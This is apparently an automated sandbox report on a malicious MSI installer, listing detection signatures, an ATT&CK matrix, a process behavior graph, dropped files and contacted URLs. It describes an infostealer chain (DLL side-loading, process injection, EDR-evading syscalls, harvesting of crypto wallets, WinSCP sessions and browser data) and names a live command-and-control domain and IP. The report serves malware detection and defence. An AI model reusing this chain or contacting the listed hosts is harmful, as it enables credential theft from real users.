                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Tries to harvest and steal Bitcoin Wallet information
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F05C @Rtlconsts@_sCannotListenOnOpen,@Rtlconsts@_sCannotCreateSocket,@Rtlconsts@_sSocketAlreadyOpen,@Rtlconsts@_sCantChangeWhileActive,@Rtlconsts@_sSocketMustBeBlocking,@Rtlconsts@_sSocketIOError,2_2_5000F05C

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Replication Through Removable Media                      		2
                      Native API                      		11
                      DLL Side-Loading                      		1
                      Exploitation for Privilege Escalation                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		11
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter                      		Boot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		1
                      Deobfuscate/Decode Files or Information                      		11
                      Input Capture                      		11
                      Peripheral Device Discovery                      		Remote Desktop Protocol11
                      Data from Local System                      		2
                      Non-Application Layer Protocol                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		1
                      Credentials in Registry                      		1
                      Account Discovery                      		SMB/Windows Admin Shares1
                      Screen Capture                      		13
                      Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook212
                      Process Injection                      		2
                      Obfuscated Files or Information                      		NTDS14
                      File and Directory Discovery                      		Distributed Component Object Model11
                      Input Capture                      		Protocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      DLL Side-Loading                      		LSA Secrets137
                      System Information Discovery                      		SSH2
                      Clipboard Data                      		Fallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      File Deletion                      		Cached Domain Credentials111
                      Security Software Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                      Masquerading                      		DCSync1
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Virtualization/Sandbox Evasion                      		Proc Filesystem2
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                      Process Injection                      		/etc/passwd and /etc/shadow1
                      System Owner/User Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565498 Sample: ONHQNHFT.msi Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 69 gakaroli.online 2->69 73 Suricata IDS alerts for network traffic 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Multi AV Scanner detection for submitted file 2->77 79 3 other signatures 2->79 10 msiexec.exe 85 45 2->10         started        13 IDRBackup.exe 1 2->13         started        16 IDRBackup.exe 1 2->16         started        18 msiexec.exe 3 2->18         started        signatures3 process4 file5 61 C:\Users\user\AppData\Local\...\vclx120.bpl, PE32 10->61 dropped 63 C:\Users\user\AppData\Local\...\vcl120.bpl, PE32 10->63 dropped 65 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 10->65 dropped 67 6 other malicious files 10->67 dropped 20 IDRBackup.exe 12 10->20         started        111 Maps a DLL or memory area into another process 13->111 113 Found direct / indirect Syscall (likely to bypass EDR) 13->113 24 cmd.exe 2 13->24         started        26 cmd.exe 1 16->26         started        signatures6 process7 file8 47 C:\Users\user\AppData\Roaming\...\vclx120.bpl, PE32 20->47 dropped 49 C:\Users\user\AppData\Roaming\...\vcl120.bpl, PE32 20->49 dropped 51 C:\Users\user\AppData\Roaming\...\sqlite3.dll, PE32 20->51 dropped 55 6 other malicious files 20->55 dropped 81 Switches to a custom stack to bypass stack traces 20->81 83 Found direct / indirect Syscall (likely to bypass EDR) 20->83 28 IDRBackup.exe 1 20->28         started        53 C:\Users\user\AppData\Local\Temp\ikltbdky, PE32+ 24->53 dropped 85 Writes to foreign memory regions 24->85 87 Maps a DLL or memory area into another process 24->87 31 comvalidate_ljv3.exe 24->31         started        33 conhost.exe 24->33         started        35 conhost.exe 26->35         started        signatures9 process10 signatures11 105 Maps a DLL or memory area into another process 28->105 107 Switches to a custom stack to bypass stack traces 28->107 109 Found direct / indirect Syscall (likely to bypass EDR) 28->109 37 cmd.exe 5 28->37         started        process12 file13 57 C:\Users\user\AppData\Local\Temp\wqosufsc, PE32+ 37->57 dropped 59 C:\Users\user\...\comvalidate_ljv3.exe, PE32+ 37->59 dropped 89 Writes to foreign memory regions 37->89 91 Found hidden mapped module (file has been removed from disk) 37->91 93 Maps a DLL or memory area into another process 37->93 95 Switches to a custom stack to bypass stack traces 37->95 41 comvalidate_ljv3.exe 37->41         started        45 conhost.exe 37->45         started        signatures14 process15 dnsIp16 71 gakaroli.online 172.67.141.133, 443, 49766, 49772 CLOUDFLARENETUS United States 41->71 97 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 41->97 99 Tries to harvest and steal browser information (history, passwords, etc) 41->99 101 Tries to harvest and steal Bitcoin Wallet information 41->101 103 Found direct / indirect Syscall (likely to bypass EDR) 41->103 signatures17

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      ONHQNHFT.msi13%ReversingLabsBinary.Trojan.Generic
                      ONHQNHFT.msi13%VirustotalBrowse

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\ikltbdky100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\wqosufsc100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\Aplanogamete\datastate.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\Aplanogamete\madbasic_.bpl0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\Aplanogamete\maddisAsm_.bpl3%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\Aplanogamete\madexcept_.bpl3%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\Aplanogamete\rtl120.bpl3%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\Aplanogamete\sqlite3.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\Aplanogamete\vcl120.bpl3%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\Aplanogamete\vclx120.bpl3%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\toolsync_RO\datastate.dll0%ReversingLabs
                      C:\Users\user\AppData\Roaming\toolsync_RO\madbasic_.bpl0%ReversingLabs
                      C:\Users\user\AppData\Roaming\toolsync_RO\maddisAsm_.bpl3%ReversingLabs
                      C:\Users\user\AppData\Roaming\toolsync_RO\madexcept_.bpl3%ReversingLabs
                      C:\Users\user\AppData\Roaming\toolsync_RO\rtl120.bpl3%ReversingLabs
                      C:\Users\user\AppData\Roaming\toolsync_RO\sqlite3.dll0%ReversingLabs
                      C:\Users\user\AppData\Roaming\toolsync_RO\vcl120.bpl3%ReversingLabs
                      C:\Users\user\AppData\Roaming\toolsync_RO\vclx120.bpl3%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://s3.amazonaws.com/myfilelist/list-itop0%Avira URL Cloudsafe
                      https://gakaroli.online/0%Avira URL Cloudsafe
                      http://idrlicense.itopupdate.com/check.php0%Avira URL Cloudsafe
                      https://gakaroli.online/b0%Avira URL Cloudsafe
                      https://gakaroli.online/c0%Avira URL Cloudsafe
                      https://www.catcert.cat/verCIT-10j0%Avira URL Cloudsafe
                      https://gakaroli.online/O0%Avira URL Cloudsafe
                      https://gakaroli.online:443y0%Avira URL Cloudsafe
                      https://gakaroli.online/edward-gringhuis0%Avira URL Cloudsafe
                      https://s3.amazonaws.com/myfilelist/list-pdf0%Avira URL Cloudsafe
                      http://epscd2.catcert.net/crl/ec-acc.crl00%Avira URL Cloudsafe
                      https://gakaroli.online:443x0%Avira URL Cloudsafe
                      https://s3.amazonaws.com/myfilelist/list-dpm0%Avira URL Cloudsafe
                      http://www.catcert.cat/descarrega/acc.crt0b0%Avira URL Cloudsafe
                      https://www.catcert.cat/verCIT-10x0%Avira URL Cloudsafe
                      http://ocsp.catcert.cat050%Avira URL Cloudsafe
                      http://epscd.catcert.net/crl/ec-acc.crl0%Avira URL Cloudsafe
                      https://gakaroli.online/0%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      gakaroli.online
                      		172.67.141.133
                      		truetrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://s3.amazonaws.com/myfilelist/list-itopIDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://stats.reportcpanel.com/iusage_v2.php3IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://idrlicense.itopupdate.com/check.phpIDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://gakaroli.online/comvalidate_ljv3.exe, 0000000A.00000003.2618354577.0000000000494000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2464101114.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2548380575.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2618939343.0000000000494000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2528549271.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2488660096.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2430835895.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2597643516.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2597643516.0000000000493000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2569610517.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2571029868.00000000004ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://gakaroli.online/bcomvalidate_ljv3.exe, 0000000A.00000003.2528549271.00000000004ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.vmware.com/0IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://gakaroli.online/ccomvalidate_ljv3.exe, 0000000A.00000003.2597643516.0000000000493000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.softwareok.com/?Freeware/Find.Same.Images.OK/Historycmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://www.softwareok.com/?Freeware/Find.Same.Images.OKcmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://s3.amazonaws.com/myfilelist/listIDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                                  		high
                                  http://www.softwareok.de/?Download=Find.Same.Images.OKcmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/envelope/IDRBackup.exe, 00000002.00000002.1820475925.0000000059801000.00000020.00000001.01000000.00000005.sdmpfalse
                                      		high
                                      https://www.catcert.cat/verCIT-10jIDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.vmware.com/0/IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://gakaroli.online/Ocomvalidate_ljv3.exe, 0000000A.00000003.2569610517.00000000004ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://ip-api.com/IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                                          		high
                                          http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://gakaroli.online:443ycomvalidate_ljv3.exe, 0000000A.00000003.2464101114.00000000004AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.???.xx/?search=%sIDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2631544073.00000001401E0000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://gakaroli.online/edward-gringhuiscomvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://s3.amazonaws.com/myfilelist/list-pdfIDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.symauth.com/cps0(IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://goto.itopupdate.com/appgoto?name=idrIDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                                                  		high
                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brcomvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://epscd2.catcert.net/crl/ec-acc.crl0IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://gakaroli.online:443xcomvalidate_ljv3.exe, 0000000A.00000003.2430835895.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2431217978.00000000004AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.softwareok.de/?Freeware/Find.Same.Images.OKcmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.catcert.net/verarrelIDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.symauth.com/rpa00IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://ip-api.com/json/IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                                                            		high
                                                            http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://s3.amazonaws.com/myfilelist/list-dpmIDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.softwareok.deIDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2631544073.00000001401E0000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://ascstats.iobit.com/base-info.phpIDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                  		high
                                                                  http://www.info-zip.org/IDRBackup.exe, 00000002.00000002.1802356275.000000000359A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.0000000004960000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.0000000002643000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.0000000005012000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.0000000002597000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://ipinfo.io/IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                      		high
                                                                      http://www.catcert.cat/descarrega/acc.crt0bIDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.softwareok.de/?Freeware/Find.Same.Images.OK/Historycmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
